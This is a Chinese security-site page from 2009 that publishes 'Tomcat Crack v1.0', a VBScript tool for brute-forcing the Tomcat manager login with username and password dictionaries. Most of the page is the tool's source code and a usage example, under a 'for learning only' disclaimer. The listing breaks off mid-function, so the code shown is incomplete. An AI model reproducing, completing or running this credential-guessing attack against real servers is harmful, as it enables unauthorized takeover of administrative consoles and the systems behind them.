热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Tomcat Crack v1.0(后台管理密码暴力破解)

发布时间:2009-10-15 09:10文章来源:未知文章作者:黑白前线 点击次数:
摘要:Tomcat后台暴力破解工具,仅供学习之用。 转载请注明出处: QQ:540410588 blog:http://hi.baidu.com/540410588 使用示例如下: cscript crack.vbs -l http://localhost:8080/manager/html/ -s 401 结果如图: 源代码如下: On Error Resume next Const sBASE_...

Tomcat后台暴力破解工具,仅供学习之用。

转载请注明出处:

QQ:540410588

blog:http://hi.baidu.com/540410588

使用示例如下:

cscript crack.vbs -l http://localhost:8080/manager/html/ -s 401

结果如图:

 

 

源代码如下:

On Error Resume next
Const sBASE_64_CHARACTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim url,user,pass,search
set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 or arg.length<> 4 then
Call useage()
Wscript.Quit
Else
Call init()
End If
'-------------------------------使用说明-------------------------------------------------------
Sub useage()
wsh.echo string(79,"*")
wsh.echo ""
wsh.echo "Tomcat Crack v1.0"
wsh.echo "Made by 孤水绕城 just for test !!!"
wsh.echo "QQ:540410588 Blog: http://hi.baidu.com/540410588"
wsh.echo ""
wsh.echo "注:此工具作为暴力破解用户名密码之用,条件是没有认证码做验证"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" -l(接收用户名密码的url,需要tomcat完整路径) -s(返回错误信息关键字)"
wsh.echo "示例如下:cscript "&wscript.scriptname&" -l http://localhost:8080/manager/html/ -s 401"
wsh.echo string(79,"*")&vbcrlf
End Sub
'-------------------------------使用说明-------------------------------------------------------
'-------------------------------读取参数-------------------------------------------------------
Sub init()
Dim s
For s=0 To arg.length-1
If(arg(s)="-l") Then :url=arg(s+1) : End If
If(arg(s)="-s") Then :search=arg(s+1) : End If
Next
If Trim(url)<>"" And Trim(search)<>"" Then
Call main()
Else
Call useage()
wscript.quit
End If

End Sub
'------------------------------该部分用于读取user和pass字典并暴力破解----------------------------------
Sub main()
Dim base
Dim path,length,fullpath,scriptName,userStr,passStr,result,postStr
fullpath=wscript.ScriptFullName:length=InStr(fullpath,scriptName):path=Mid(fullpath,1,length-1)
Set fso=CreateObject("Scripting.FileSystemObject")
If fso.fileExists(path&"user.txt") And fso.fileExists(path&"pass.txt") Then
Set otfuser=fso.OpenTextFile(path&"user.txt")
Do While otfuser.AtEndOfLine <> True
userStr=otfuser.readLine()
userStr=RegReplace(userStr,"[\s]+","") '去除多余空格
If(userStr<>"") Then
Set otfpass=fso.OpenTextFile(path&"pass.txt")
Do While otfpass.AtEndOfLine <> True
passStr=otfpass.readLine()
wsh.echo "Checking...... "&userStr&"------"&passStr
postStr=Base64encode(userStr&":"&passStr)
result=getHTTPPage(url,postStr)
If(InStr(1,result,search,1)<1) Then
wsh.echo ""
wsh.echo "Good Job !!!"&vbcrlf&"You Have Found The Result"& vbcrlf&"username: "&userStr&" ------- password: "&passStr
wscript.quit
End If
loop
End If
Loop
wsh.echo "Sorry I can't Find The Result , Please Expand The Dic."
Else
MsgBox("请确定user.txt和pass.txt放在"&path&"文件夹中")
wscript.quit
End If
Set otfuser=Nothing
Set otfpass=Nothing
Set fso=Nothing
End Sub
Function RegReplace(ByVal str1, ByVal patrn, ByVal replStr)
Dim regEx
Set regEx = New RegExp
regEx.Pattern = patrn
regEx.MultiLine = True
regEx.IgnoreCase = True
regEx.Global = True
RegReplace = regEx.Replace(str1, replStr)
set regEx = Nothing
End Function
'------------------------------该部分用于读取user和pass字典并暴力破解----------------------------------

'------------------------------该部分用于提交数据----------------------------------------

function getHTTPPage(url,postStr)
dim Http
'set Http=createobject("MSXML2.XMLHTTP") '用这个组件报错
set Http=createobject("MSXML2.serverXMLHTTP") '这个组件才成
Http.open "GET",url,False
Http.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
Http.setRequestHeader "Connection", "Keep-Alive"
Http.setRequestHeader "Cache-Control", "no-cache"

标签分类: 网络攻防

上一篇:Linux 入侵踪迹隐藏攻略
下一篇:HttpCrack V1.0(破解网页后台无验证密码)